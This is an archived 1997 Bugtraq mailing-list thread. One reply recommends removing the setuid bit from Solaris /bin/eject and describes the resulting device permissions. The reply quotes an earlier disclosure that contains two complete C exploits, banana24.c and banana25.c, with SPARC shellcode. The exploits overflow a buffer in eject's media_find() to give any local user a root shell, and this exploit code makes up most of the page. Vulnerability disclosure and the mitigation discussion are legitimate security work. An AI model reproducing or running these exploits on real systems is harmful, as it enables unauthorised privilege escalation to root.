[4162] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X -

daemon@ATHENA.MIT.EDU (Jonathan Sturges)
Fri Mar 14 01:06:42 1997

Date: 	Thu, 13 Mar 1997 17:44:58 -0500
Reply-To: Jonathan Sturges <jonathan@CC.ODU.EDU>
From: Jonathan Sturges <jonathan@CC.ODU.EDU>
X-To:         Cristian SCHIPOR <skipo@SUNDY.CS.PUB.RO>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.GSO.3.95.970313211326.23406A-100000@sundy.cs.pub.ro>

Hi,
I was just testing this on my Solaris 2.5 (SPARC) boxes.  And, it appears
that if you're running Volume Management (vold), that eject doesn't need
to be set-UID anyway.

Here's what I did:
*  chmod 555 /usr/bin/eject (hard-linked to /bin/eject).  This
immediately protects you from the exploits.
*  If volume management is running (/usr/ucb/ps -auxww | grep vold), you
can still eject BOTH CD's and floppies.
*  If volume management is NOT running, you CANNOT eject the CD (device
permissions are 640), but you CAN still eject a floppy (perms are 666).

These permissions seem to be the default permissions on Solaris SPARC 2.5
and 2.5.1.

Running the exploits, below, will only pop you a shell as yourself, of
course, once /usr/bin/eject has perms. 555.

thanks for pointing this hole out!!!
-Jonathan


On Thu, 13 Mar 1997, Cristian SCHIPOR wrote:

> motto: "Mihai Eminescu was a good friend of Ion Creanga"
>
> Thu  Mar 13 21:01:00 EET 1997  - Romania
>
> "Hole in /bin/eject - buffer overflow"
>
> I exploited the buffer overflow hole in /bin/eject on Solaris 2.X (who
> have suid exec bit and is owned by root). The buffer overflow problem
> appears in an internal function media_find(). The result is: any user can
> gain root shell. So, to prevent /bin/eject exploit, you have to get out
> suid-exec bit from /bin/eject (that's very simple) and compile a little
> program like:
>
>  main()
>  {execl("/bin/eject","eject","floppy",(char *)0);}
>
> That allows your work station ordinary users to eject floppy (thats the main
> task for eject).
>
> I wrote two exploits (Solaris 2.4 & 2.5.1). My exploit for Solaris 2.4
> looks a bit ugly - the buffer is two short - but it works.
> For both exploits argv[1] can change the STACK_OFFSET value (for
> troubleshotings +- 8 .. +-64 .. the step is 8).
> The interesting thing about this exploit it worked on some machines where
> it was installed some stuff to make inofensiv buffer overflows exploits ...
>
> Ok you have right down two exploits.
> For future I'm planing a web page with security stuff for Solaris so try
> http://www.math.pub.ro/security.
>
> Cristian Schipor - Computer Science Faculty - Bucharest - Romania
> E-mail: skipo@sundy.cs.pub.ro, skipo@math.pub.ro, skipo@ns.ima.ro
> Phone: 401-410.60.88
>
> ------------------------ banana24.c -----------------------------
> /* For Solaris 2.4 */
>
>    #include <stdio.h>
>    #include <stdlib.h>
>    #include <sys/types.h>
>    #include <unistd.h>
>
>    #define BUF_LENGTH 264
>    #define EXTRA 36
>    #define STACK_OFFSET 8
>    #define SPARC_NOP 0xc013a61c
>
>    u_char sparc_shellcode[] =
>
>    "\xc0\x13\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
>    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
>    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
>    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
>    "\x91\xd0"/*\x20\x08"*/
>    ;
>
>    u_long get_sp(void)
>    {
>    __asm__("mov %sp,%i0 \n");
>    }
>
>    void main(int argc, char *argv[])
>    {
>    char buf[BUF_LENGTH + EXTRA + 8];
>    long targ_addr;
>    u_long *long_p;
>    u_char *char_p;
>    int i, code_length = strlen(sparc_shellcode),dso=0;
>
>    if(argc > 1) dso=atoi(argv[1]);
>
>    long_p =(u_long *) buf ;
>    targ_addr = get_sp() - STACK_OFFSET - dso;
>
>    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
>    *long_p++ = SPARC_NOP;
>
>    char_p = (u_char *) long_p;
>
>    for (i = 0; i < code_length; i++)
>    *char_p++ = sparc_shellcode[i];
>
>    long_p = (u_long *) char_p;
>
>    for (i = 0; i < EXTRA / sizeof(u_long); i++)
>    *long_p++ =targ_addr;
>
>    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
>    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
>    execl("/bin/eject", "eject", & buf,(char *) 0);
>    perror("execl failed");
>    }
> ------------------------- end of banana24.c ------------------------
>
> ------------------------- banana25.c -------------------------------
> /* Wrote for Solaris 2.5.1 */
>
>    #include <stdio.h>
>    #include <stdlib.h>
>    #include <sys/types.h>
>    #include <unistd.h>
>
>    #define BUF_LENGTH 364
>    #define EXTRA 400
>    #define STACK_OFFSET 400
>    #define SPARC_NOP 0xa61cc013
>
>    u_char sparc_shellcode[] =
>
>    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
>    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
>    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
>    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
>    "\x91\xd0\x20\x08"
>    ;
>
>    u_long get_sp(void)
>    {
>    __asm__("mov %sp,%i0 \n");
>    }
>
>    void main(int argc, char *argv[])
>    {
>    char buf[BUF_LENGTH + EXTRA + 8];
>    long targ_addr;
>    u_long *long_p;
>    u_char *char_p;
>    int i, code_length = strlen(sparc_shellcode),dso=0;
>
>    if(argc > 1) dso=atoi(argv[1]);
>
>    long_p =(u_long *) buf ;
>    targ_addr = get_sp() - STACK_OFFSET - dso;
>    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
>    *long_p++ = SPARC_NOP;
>
>    char_p = (u_char *) long_p;
>
>    for (i = 0; i < code_length; i++)
>    *char_p++ = sparc_shellcode[i];
>
>    long_p = (u_long *) char_p;
>
>    for (i = 0; i < EXTRA / sizeof(u_long); i++)
>    *long_p++ =targ_addr;
>
>    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
>    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
>    execl("/bin/eject", "eject", & buf[1],(char *) 0);
>    perror("execl failed");
>    }
> ---------------------------- end of banana25.c ------------------------
>

home help back first fref pref prev next nref lref last post